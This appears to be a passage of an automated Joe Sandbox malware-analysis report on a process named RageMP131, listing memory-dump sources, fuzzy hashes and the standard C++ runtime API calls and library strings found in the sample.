                                    • Instruction Fuzzy Hash: B4E09B321665B15AD621777DBD0179B77998F897B0F150231EC44B64D0DB61DC40C2E2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1237bf61db026608b1143e569c25a21d2636027c215cf8770ca27bea1bdbb620
                                    • Instruction ID: 8e31309bb8a3c92b16d03c0536012cb3f546afc51be21f58a744ed2d45c0451a
                                    • Opcode Fuzzy Hash: 1237bf61db026608b1143e569c25a21d2636027c215cf8770ca27bea1bdbb620
                                    • Instruction Fuzzy Hash: CD0128A7148214AE9102C041563CBF2FA5FF282331F318667F84AD7541F295450B64B1
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb8ae83c30640eee53d2db6af7625c3cd1e2c2576b2588dc5fcc831fcec0fffe
                                    • Instruction ID: 328e2b2a714516ca37a95814431c4b60d06523ac90db12f44e7ffc594ec7446a
                                    • Opcode Fuzzy Hash: bb8ae83c30640eee53d2db6af7625c3cd1e2c2576b2588dc5fcc831fcec0fffe
                                    • Instruction Fuzzy Hash: 20F0287750C214EFD302E9A1845D9F9BE57BA83230F24817BF85E87502E2658156A632
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cc94cd8e008f7db1bcb2e377dc32fffce8d2aea7d23e5655c837528007ea6d91
                                    • Instruction ID: adaef05500bceaa18f5565ed377263eac7a823d2d3dba15e9fcd80021c588dd0
                                    • Opcode Fuzzy Hash: cc94cd8e008f7db1bcb2e377dc32fffce8d2aea7d23e5655c837528007ea6d91
                                    • Instruction Fuzzy Hash: 01F0A7A704C110EF9342D591912D5F5FA07B646230F34C157B85F9B6026668865A9672
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 427792cb8fe8bfd600ab86d2879804ddb3a6b50b6d98dce507c38da701b73038
                                    • Instruction ID: 0be5137866f802284e05ff18136bd32d002f681e07a710789593c2548f9fd7c0
                                    • Opcode Fuzzy Hash: 427792cb8fe8bfd600ab86d2879804ddb3a6b50b6d98dce507c38da701b73038
                                    • Instruction Fuzzy Hash: 23E0CD6715C200DB9342D261913D7F5FD47B742271F60815BA85FD75026568815AD533
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cb197d6efc9d099d01672378935bda43f9c87c551ce8744a43d2990e7bc8f08c
                                    • Instruction ID: b441478873e1b452fdf0314776ecbfa7c0f4a359dd2c4c1789423c6423b0ddc3
                                    • Opcode Fuzzy Hash: cb197d6efc9d099d01672378935bda43f9c87c551ce8744a43d2990e7bc8f08c
                                    • Instruction Fuzzy Hash: 0BE07D2311C200DBD243DB31C02D5F5FA07F702134F24C617A48FD7903A959012A8A32
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b9df9c43ca279c35a2ae0b4593d79f27ad229c3509fb6c04feda0bfba7483e0
                                    • Instruction ID: 97570b40e1b34cf20ff026e78ca9c6554450508c9569fdb59e36761bf43b987e
                                    • Opcode Fuzzy Hash: 0b9df9c43ca279c35a2ae0b4593d79f27ad229c3509fb6c04feda0bfba7483e0
                                    • Instruction Fuzzy Hash: EFD02B7304D100D78202E661801E7F5F947B702161F108147B49B97D436A580196D573
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c184d33bb3871fc71d3f379f99f0190d904bee9bded608a845b9706391dbaf1
                                    • Instruction ID: f80810c01c610b346e8eb89083bde1ecad12654a77e476e36c4d42eb82de3356
                                    • Opcode Fuzzy Hash: 7c184d33bb3871fc71d3f379f99f0190d904bee9bded608a845b9706391dbaf1
                                    • Instruction Fuzzy Hash: 68D02EA3849348638243E1A1527E3F2EC4B57071A5F2081A3AC06BBA83B18A0626D1B2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0099AEB3
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0099AED5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0099AEF5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0099AF1F
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0099AF8D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0099AFD9
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0099AFF3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0099B088
                                    • std::_Facet_Register.LIBCPMT ref: 0099B095
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 582b8fe6cc52ea613fb49786fdf712eb4a2a28afb2c390c8171d731c14d40826
                                    • Instruction ID: dcadba69b9993ae2338465ab038bf2a9f549567087d7ac217fdf9f5523c895b7
                                    • Opcode Fuzzy Hash: 582b8fe6cc52ea613fb49786fdf712eb4a2a28afb2c390c8171d731c14d40826
                                    • Instruction Fuzzy Hash: 0B6172B1D00248DBDF21DFA8DA85BDEBBB8EF14350F144059E805A7381EB74D909CBA2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009337E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00933835
                                    • __Getctype.LIBCPMT ref: 0093384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0093386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009338FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: bad locale name
                                    • API String ID: 1840309910-1405518554
                                    • Opcode ID: 10059118c0a6aba6cd644448cf075fa605d5f926934b6115ab1cb62352bc4ca0
                                    • Instruction ID: c5dd6c29998b9dd84f18a17b96cf4ddf2c6f45e10717c6abd247a8d0a2bcba86
                                    • Opcode Fuzzy Hash: 10059118c0a6aba6cd644448cf075fa605d5f926934b6115ab1cb62352bc4ca0
                                    • Instruction Fuzzy Hash: CB5151F1D00248DBDF10DFA4D9857DEFBB8AF14314F148169F805AB281E775AA48CBA2
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00A108B7
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00A108BF
                                    • _ValidateLocalCookies.LIBCMT ref: 00A10948
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00A10973
                                    • _ValidateLocalCookies.LIBCMT ref: 00A109C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: b6f477e55abd48421dea29b616dbf7a1f8756918f02b7bb5130130cd59dfd102
                                    • Instruction ID: 2ef71deb27197413cb8c016b88c1e446dbc82979b6057c8188e728e4c483d558
                                    • Opcode Fuzzy Hash: b6f477e55abd48421dea29b616dbf7a1f8756918f02b7bb5130130cd59dfd102
                                    • Instruction Fuzzy Hash: 1541C034A00209ABCF10DF68C990EEEBBB5BF44364F148055F9189B392D7B1EAC5CB90
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00999543
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00999566
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00999586
                                    • std::_Facet_Register.LIBCPMT ref: 009995FB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00999613
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0099962B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: c4848757745c735b06f6496e7c5cc19c6336520b40ceed2402de96926b97a01c
                                    • Instruction ID: d4fc84f6b5a81a53902ff5a7918628eadb1e8ac5f193a5ab750d287385e041e3
                                    • Opcode Fuzzy Hash: c4848757745c735b06f6496e7c5cc19c6336520b40ceed2402de96926b97a01c
                                    • Instruction Fuzzy Hash: D741CE71D002199FCF11EF9CE941AAEBBB8FB41324F154619E805AB391DB70AE45CBE1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009360F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0093617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00936248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 009361CC
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: c652191de9160b7f25a51a5cb38645dc9c5452714bdd77177965d53bf3002cd2
                                    • Instruction ID: cea32b4e7d8f7b20593da52d5a68196bf8d031e78eca281c14632985f0051cef
                                    • Opcode Fuzzy Hash: c652191de9160b7f25a51a5cb38645dc9c5452714bdd77177965d53bf3002cd2
                                    • Instruction Fuzzy Hash: B7E1FFB0900604AFDB28DF68D945B9EF7F9FF48700F108A1DE45697681E774AA48CFA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009386DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009386ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: aacad2cc5f00980e1902ffa1c871d65dcee9c9cccacb2b3cf6c6d14967f10433
                                    • Instruction ID: 89bad5c11442c4e85bb3cb54707244323367914a7253a9c2811b486e9efa61a8
                                    • Opcode Fuzzy Hash: aacad2cc5f00980e1902ffa1c871d65dcee9c9cccacb2b3cf6c6d14967f10433
                                    • Instruction Fuzzy Hash: D36128719003099FDB08CF68DD85B9EBBB5FF44314F148618F415AB7D2EB74AA848B91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A3946
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A395F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A3A97
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A3AB0
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A3C16
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A3C2F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A4479
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 009A4492
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 470a5c1ee603e207425f0e4ff73c58ca0591b0618fe30084c707547dae84bff3
                                    • Instruction ID: 4b288b9d4122b5633d8f7b374712cea3b072ef78713ab8e9d9f0f4d17765d49a
                                    • Opcode Fuzzy Hash: 470a5c1ee603e207425f0e4ff73c58ca0591b0618fe30084c707547dae84bff3
                                    • Instruction Fuzzy Hash: 0951E270C0024CDBDF14DFA8DD89BDEBBB4BF46304F148659E455A7282DB746A88CBA1
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00933C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: 725452fcc27b59f85d41ca07c08f62de221ee8e69feb545f249cddd4d6a90f7a
                                    • Instruction ID: 5eb20a770dc8ca77eb1b1575400218780104bec54831b5ca6a7e1806ff2bc709
                                    • Opcode Fuzzy Hash: 725452fcc27b59f85d41ca07c08f62de221ee8e69feb545f249cddd4d6a90f7a
                                    • Instruction Fuzzy Hash: 1311C0B29507086BC710DF59D801BA6F7E8AF44320F08C92AFD58DB281F774A914CF91
                                    Strings
                                    • unordered_map/set too long, xrefs: 009A2F43
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
